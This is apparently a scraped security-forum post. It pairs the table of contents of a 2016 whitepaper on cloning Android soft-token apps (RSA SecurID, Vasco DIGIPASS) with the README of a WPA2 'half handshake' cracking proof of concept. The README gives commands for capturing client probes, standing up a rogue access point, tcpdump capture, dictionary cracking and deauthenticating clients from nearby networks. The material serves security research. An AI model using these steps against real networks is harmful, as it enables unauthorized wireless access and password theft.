...........................................................................................................................................9 The Android Reverser’s Toolbox......................................................................................................................... 10 De-Compilers, Disassemblers and Debuggers.....................................................................................................................10 Tracing Java Code.....................................................................................................................................................................11 Tracing Native Code ................................................................................................................................................................15 Tracing System Calls.................................................................................................................................................................17 Classic Linux Rootkit Style......................................................................................................................................................19 Dynamic Analysis Frameworks..............................................................................................................................................19 Drawbacks Emulation-based Analysis ..................................................................................................................................21 Hacking Soft Tokens - Bernhard Mueller © 2016 Vantage Point Security Pte. 4 of 68 Runtime Instrumentation with Frida .....................................................................................................................................22 Building A Sandbox................................................................................................................................................ 23 Sandbox Overview....................................................................................................................................................................24 Customizing the Kernel...........................................................................................................................................................25 Customizing the RAMDisk.....................................................................................................................................................26 Booting the Environment .......................................................................................................................................................28 Customizing ART.....................................................................................................................................................................29 Hooking System Calls ..............................................................................................................................................................31 Automating System Call Hooking with Zork.......................................................................................................................35 Case Studies ............................................................................................................................................................. 36 RSA SecurID: ProGuard and a Proprietary Algorithm...........................................................................................................37 Analyzing ProGuard-processed Bytecode ............................................................................................................................37 Data Storage and Runtime Encryption .................................................................................................................................39 Tool Time: RSACloneId..........................................................................................................................................................41 Vendor Response......................................................................................................................................................................44 Summary.....................................................................................................................................................................................45 Vasco DIGIPASS: Advanced Anti-Tampering........................................................................................................................47 Initial Analysis ...........................................................................................................................................................................47 Root Detection and Integrity Checks....................................................................................................................................51 Native Debugging Defenses ...................................................................................................................................................54 JDWP Debugging Defenses....................................................................................................................................................56 Static-dynamic Analysis............................................................................................................................................................58 Attack Outline ...........................................................................................................................................................................59 Tool Time: VasClone....................................................................................................................................................................60 Vendor Comments........................................................................................................................................................................64 Summary.....................................................................................................................................................................................65 TL; DR...................................................................................................................................................................... 66 Attack Mitigation...........................................................................................................................................................................66 Software Protection Effectiveness..............................................................................................................................................66 REFERENCES....................................................................................................................................................... 67 Download: http://gsec.hitb.org/materials/sg2016/whitepapers/Hacking Soft Tokens - Bernhard Mueller.pdf

WPA2-HalfHandshake-Crack Conventional WPA2 attacks work by listening for a handshake between client and Access Point. This full fourway handshake is then used in a dictonary attack. This tool is a Proof of Concept to show it is not necessary to have the Access Point present. A person can simply listen for WPA2 probes from any client withen range, and then throw up an Access Point with that SSID. Though the authentication will fail, there is enough information in the failed handshake to run a dictionary attack against the failed handshake. For more information on general wifi hacking, see here Install $ sudo python setup.py install Sample use $ python halfHandshake.py -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like 127.0.0.1" -r Where to read input pcap file with half handshake (works with full handshakes too) -m AP mac address (From the 'fake' access point that was used during the capture) -s AP SSID -d (optional) Where to read dictionary from Capturing half handshakes To listen for device probes the aircrack suite can be used as follows sudo airmon-ng start wlan0 sudo airodump-ng mon0 You should begin to see device probes with BSSID set as (not associated) appearing at the bottom. If WPA2 SSIDs pop up for these probes, these devices can be targeted Setup a WPA2 wifi network with an SSID the same as the desired device probe. The passphrase can be anything In ubuntu this can be done here http://ubuntuhandbook.org/index.php/2014/09/3-ways-create-wifi-hotspot-ubuntu/ Capture traffic on this interface. In linux this can be achived with TCPdump sudo tcpdump -i wlan0 -s 65535 -w file.cap (optional) Deauthenticate clients from nearby WiFi networks to increase probes If there are not enough unassociated clients, the aircrack suite can be used to deauthenticate clients off nearby networks http://www.aircrack-ng.org/doku.php?id=deauthentication Sursa: https://github.com/dxa4481/WPA2-HalfHandshake-Crack